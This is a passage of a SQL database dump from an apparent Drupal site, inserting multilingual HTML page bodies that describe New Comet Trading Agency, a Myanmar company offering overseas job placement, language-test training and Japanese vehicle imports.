style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">자격시험</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(JLPT, JFT, NAT-TEST, TOP-J)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">합격할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">어학당도</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">개설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">및 교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">지원하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희는</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">”</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>”&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-weight:bold;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">미얀마에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">우수한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기능인력을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">배출하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">해외로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">파견하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">서비스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공하기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">끊임없이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">노력하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 1, 180, 'en', 0, '<h3>Welcome to Our Website \"NEW COMET TRADING AGENCY\"!!!!</h3><img src=\"/sites/default/files/inline-images/new_comet_trading_agency_0.jpg\" data-align=\"center\" data-entity-uuid=\"42e9d2a3-e284-49bb-81cb-2510b37a5871\" data-entity-type=\"file\"><p>Thank you for visiting our website, \"NEW COMET TRADING AGENCY\"! We are delighted to have you here. Please feel free to explore our website and learn more about the services and opportunities we offer. If you have any questions or need assistance, don\'t hesitate to reach out to us. We are here to help you on your journey towards achieving your goals.</p><h3>&nbsp;</h3><p>&nbsp;</p>', '', 'full_html'),
('page', 0, 1, 180, 'ja', 0, '<h3 style=\"-webkit-text-stroke-width:0px;background-color:rgb(244, 244, 244);box-sizing:border-box;color:rgb(52, 52, 52);font-family:pyidaungsu;font-size:1.7em;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;letter-spacing:normal;line-height:40px;margin:0px 0px 1rem;orphans:2;padding:0px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\"><strong>弊社ウェブサイト「NEW COMET TRADING AGENCY」へようこそ！</strong></h3><h3 style=\"-webkit-text-stroke-width:0px;background-color:rgb(244, 244, 244);box-sizing:border-box;color:rgb(52, 52, 52);font-family:pyidaungsu;font-size:1.7em;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;letter-spacing:normal;line-height:40px;margin:0px 0px 1rem;orphans:2;padding:0px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\"><strong><img data-entity-uuid=\"11bdd5ab-02ab-46db-adb5-ee71d641622a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-4f55b8ebb3b47b4a42250c8beee726bd7e8c58d2421acc8cb9e74564397af8ac_915ef54ff9aea418.jpg\"></strong><o:p></o:p><o:p></o:p></h3>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 1, 180, 'ko', 0, '<h3>안녕하세요.우리 웹사이트 \"뉴코멧 영업 대행사\" &nbsp;에서 환영합니다.</h3><p>&nbsp;</p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> ``New Comet Trading\'\'&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">회사는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">년에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">설립되어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">사업자등록번호</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(295/2004-2005)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">영업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">뉴코멧무역대행</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">뉴코멧</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">외국인고용업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">면허를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">취득하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">활동을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희 <strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>해외직업소개회사</strong>&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"New Comet Overseas Employment Agency\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는자매</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">회사인&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\"> </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>제야뉴코멧 자동차 판매 및 서비스 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧회사</strong>등</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기업들과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">협력하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">경제통상자원부에서&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">차량</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">수입허가를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">신청했고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">각종</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">상용트럭</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">관광</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">산업 및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">운송에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">사용되는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">다양한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">유형의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">버스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기계를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일본에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">직접</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">구매 판매하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">사업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span 